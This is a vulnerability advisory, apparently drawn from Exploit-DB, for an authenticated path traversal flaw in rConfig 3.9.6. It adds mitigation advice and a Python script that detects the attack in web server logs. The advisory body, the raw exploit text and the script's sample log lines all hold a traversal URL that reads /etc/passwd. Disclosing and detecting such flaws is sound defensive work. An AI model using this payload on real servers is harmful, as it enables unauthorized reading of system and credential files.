Vendor: rConfig
By: 5a65726f
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: rConfig
Affected Version From: rConfig v3.9.6
Affected Version To: rConfig v3.9.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: centOS 7
2021

rConfig 3.9.6 – ‘path’ Local File Inclusion (Authenticated)

rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php through the `path` parameter. ajaxGetFileByPath.php allows authenticated users to download any file on the server. To reproduce the vulnerability, log in to the rConfig application with your credentials and enter the following link in your browser: http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd

Mitigation:

Restrict access to the vulnerable file, and ensure that the application is running with the least privileges necessary.
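
A detection check to accompany this mitigation, as an added example (not code from the advisory or from rConfig): it scans web server access logs for requests to the handler whose `path` parameter contains a `..` segment. The combined log format and the sample log lines are assumptions, constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter named in the advisory.
ENDPOINT = "/lib/ajaxHandlers/ajaxGetFileByPath.php"
PARAM = "path"

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2021:10:01:02 +0000] "GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.0.2.11 - - [12/Mar/2021:10:02:00 +0000] "GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2021:10:03:00 +0000] "GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=configs/router1/showrun.txt HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2021:10:04:00 +0000] "GET /other.php?path=../x HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encodings of '..' are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value contains a '..' path segment."""
    return ".." in fully_decode(value).replace("\\", "/").split("/")

def find_traversal_requests(log_text):
    """Return one finding per request to ENDPOINT with a traversing PARAM."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(ENDPOINT.lower()):
            continue  # some other page; PARAM there is out of scope
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                findings.append({"client": client, "status": int(status),
                                 "path": fully_decode(value)})
    return findings

if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

Only parameters sent in the query string appear in access logs, so this check covers the request form shown in the advisory.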

Exploit-DB raw data:

# Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
# Date: 2021-03-12
# Exploit Author: 5a65726f
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
# Version: rConfig v3.9.6
# Install scripts  :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Tested on: centOS 7
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall

# Description:
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.  ajaxGetFileByPath.php allows authenticated users to download any file on the server.

The following steps can be carried out in duplicating this vulnerability.

- Login the rConfig application with your credentials.
- Enter the following link to your browser: 
http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd